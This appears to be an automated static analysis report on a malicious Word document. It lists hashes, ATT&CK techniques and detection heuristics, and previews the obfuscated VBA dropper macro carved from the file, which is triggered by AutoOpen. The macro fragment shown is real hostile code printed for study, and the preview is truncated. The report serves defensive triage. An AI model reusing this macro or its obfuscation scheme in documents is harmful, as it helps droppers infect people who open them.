Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 edf206794926e9ce…

MALICIOUS

Office (OLE)

219.5 KB Created: 2018-02-24 12:17:31 Authoring application: Microsoft Office Word First seen: 2020-02-04
MD5: c8547f2d547ce2904634cbba4fe6bc83 SHA-1: 41396700b738dcc38e1250c2a826f3ed36542c74 SHA-256: edf206794926e9ce036c5d32b024e04d890abcb36321186fd6d5cc139ca69727
222 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1140 Deobfuscate or Obfuscate Malicious Text and Code

The file is a Microsoft Office document containing a VBA macro. The macro is triggered by the AutoOpen function and uses CreateObject to likely download and execute a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-6464854-0' further supports its malicious nature as a dropper. The VBA code is heavily obfuscated, making it difficult to determine the exact download URL or execution details.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6464854-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6464854-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 70537 bytes
SHA-256: 74b9af94c3a9bd200bc31a5581e027761268b134c3468445bf34c2472efa3102
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 28 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "UEufDdqbv"
Function PaiFTzwRWjTUw()
On Error Resume Next
cnrvFizoS = "SqSmjutrOHXac!%3rav%!!%8rav%!!%HWEmUowWWHws"
dqiacrda = 4185429 / Atn(HJHHDOF) / (5638159 - YPjbRzEwJ / 2891041 - Sqr(miiKqRM * CStr(klTKJBo / Sgn(3722370 - CDate(7887620 / FhnOrJY * 2635075 * Sqr(DqvVBOGc))))) + (fwQmCuslF - 820513 / 4396564 / CLng(4941431)))
LisSXr = 5600425 / Atn(OkDhbYqUlc) / (27213 - UoPRwD / 4865724 - Sqr(nsvTfsV * CStr(EUqraM / Sgn(6306747 - CDate(7152367 / hfEiKKomtZEVnI * 3809841 * Sqr(NqWoj))))) + (iCjQR - 7288842 / 1681166 / CLng(6464746)))
dTBjoTZATK = zNZBdpCHj + dd333h3sd(cnrvFizoS, 13, 18)
cYJcI = "rtuCvVBMpYXpUGLG"
KlOHCtOSVCk = 8868211 / Atn(nLrjwIMKTLzi) / (9091 - wpOPCCmnFp / 5515616 - Sqr(RvRvCjoBSs * CStr(VXmkIHAfiVp / Sgn(2552144 - CDate(5240778 / BwrAzFBD * 4184749 * Sqr(RtYITqwIFHsrQ))))) + (ijFJwHci - 8161564 / 5504047 / CLng(277182)))
jHONZjUtc = 6559402 / Atn(BSmjSBvTPirMnW) / (6263483 - UZJhZV / 3716623 - Sqr(rEOPj * CStr(wHltz / Sgn(8136479 - CDate(3543263 / aqVwPzNzKk * 9138231 * Sqr(WCrAXfzmoN))))) + (fkMmkauZqptz - 3681673 / 2410670 / CLng(5341876)))
IBmKqnUTRi = HiUOYV + dd333h3sd(cYJcI, 5, 1)
fBWzG = "qDIDTvHzYYbDhLFT pTqvjPPP"
DVYVu = 8550160 / Atn(GaVQI) / (3186624 - VUpXqqzCdCf / 8527805 - Sqr(NldPsVubjqDpkO * CStr(zhZhjt / Sgn(4576563 - CDate(8707739 / TDEfktQbpvrUz * 1174699 * Sqr(nWFpdliFb))))) + (EwczLDpsmwpRO - 8335277 / 7341066 / CLng(5003856)))
PUzrOiu = 5512321 / Atn(pXnzb) / (272760 - KniPGlzcpfznd / 5671326 - Sqr(BbLJiWHODDIhP * CStr(BFVbE / Sgn(253249 - CDate(3124134 / cfKroZ * 2350618 * Sqr(mzWwVLoRSXCY))))) + (MzDhYnacMZ - 5418083 / 5209770 / CLng(8848279)))
vLNzJIT = VmttiT + dd333h3sd(fBWzG, 9, 1)
tEsIiVvAwb = "Npl!%6rav%!!%5rav%!zYfCnNsfFFwSXQBQFjGo"
WSrRqzOXV = 5605141 / Atn(ZuZWGLD) / (1139194 - VjUAmWCwPD / 2782145 - Sqr(dnpKn * CStr(WBwHvAwM / Sgn(7488216 - CDate(3088139 / OBRnlY * 8378715 * Sqr(czwiTYHO))))) + (wGkMTu - 6402016 / 883244 / CLng(5805270)))
vnUqwEc = 2741150 / Atn(UCajmpBBzRrP) / (9576269 - LRXWfjolsPjfw / 9040544 - Sqr(kiHKDw * CStr(ZPsdXFRoE / Sgn(8407106 - CDate(7462135 / IdKiwfAi * 2021924 * Sqr(DHtGuMi))))) + (EutlsIiBMiTD - 2212923 / 7772919 / CLng(8587599)))
ToFZGUIsd = fzrhiCPRJKRipQ + dd333h3sd(tEsIiVvAwb, 21, 16)
EqnYznhBT = "vlQznhEMruzHCoIJvRHBlQSwT"
XZaKt = 2722845 / Atn(cOPAXz) / (9444335 - zYzowCPlTn / 6085085 - Sqr(pBzHiHCuXDob * CStr(wVlsEmiaUBmHYP / Sgn(2789584 - CDate(7516832 / vwkaPaQHRPuC * 594006 * Sqr(jYqCjitOBzMVz))))) + (zKsoHlH - 8421670 / 8233303 / CLng(4646744)))
qjXQPXPNPmP = 6276212 / Atn(VkmWnYRHCjiNiJ) / (8634859 - vnNtaEIHXGu / 3317844 - Sqr(rhSVlIIbiKoE * CStr(JPciGwsawDKmU / Sgn(3109124 - CDate(5309439 / zjiAVKCPrzA * 6911917 * Sqr(RdZpiv))))) + (fsAvYMvdHjQsh - 9240046 / 5887936 / CLng(5727835)))
LnIto = mdaAIiDPPO + dd333h3sd(EqnYznhBT, 22, 2)
RwcVYU = "wFwVjDG=%bOLwjlwjzKjIlbzNCB"
AViWSzHLGv = 1716180 / Atn(ZcBbEAuPWKo) / (3041897 - lVSIaHCzcafBcJ / 2796487 - Sqr(bYfDkYsj * CStr(wiJzsrAtAbUwRo / Sgn(9666983 - CDate(1261475 / wCWZcqjwvlI * 2361411 * Sqr(NciNdZt))))) + (jifIbiuUJkhwAb - 8124434 / 2634874 / CLng(4204218)))
AmsWkkLd = 3998561 / Atn(dzzFrhoOrNDKY) / (2589801 - NTqRAIldlAb / 2942394 - Sqr(lmVrJhQ * CStr(ldnan / Sgn(3898805 - CDate(597164 / FZIjQO * 4416933 * Sqr(EUjrVMEQS))))) + (cEsMBrzjbq - 637377 / 8114152 / CLng(2380422)))
OjrCR = EXwNMn + dd333h3sd(RwcVYU, 10, 14)
rGzWT = "WHEhi!%4rav%!DqsDsHjGHtwNLCYUmzMMMbbtiN"
knvGlqqqSB = 3954607 / Atn(GOAjpIYI) / (4541315 - KYIbmS / 8387268 - Sqr(jlBUrrZEro * CStr(TiiIU / Sgn(481405 - CDate(1210321 / ijEDbqhW * 6683953 * Sqr(wEbjTMjRmXJHk))))) + (jIDbjPoY - 6181046 / 9701350 / CLng(2514310)))
nphrLwCBNGt = 8685913 / Atn(hadJUqOvjZ) / (7067918 - RYCQiKW / 9841936 - Sqr(TSnGpTBXYcVa * CStr(CrINoRVVAjTQ / Sgn(2873935 - CDate(8224967 / IzoqtmNIqDiX
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.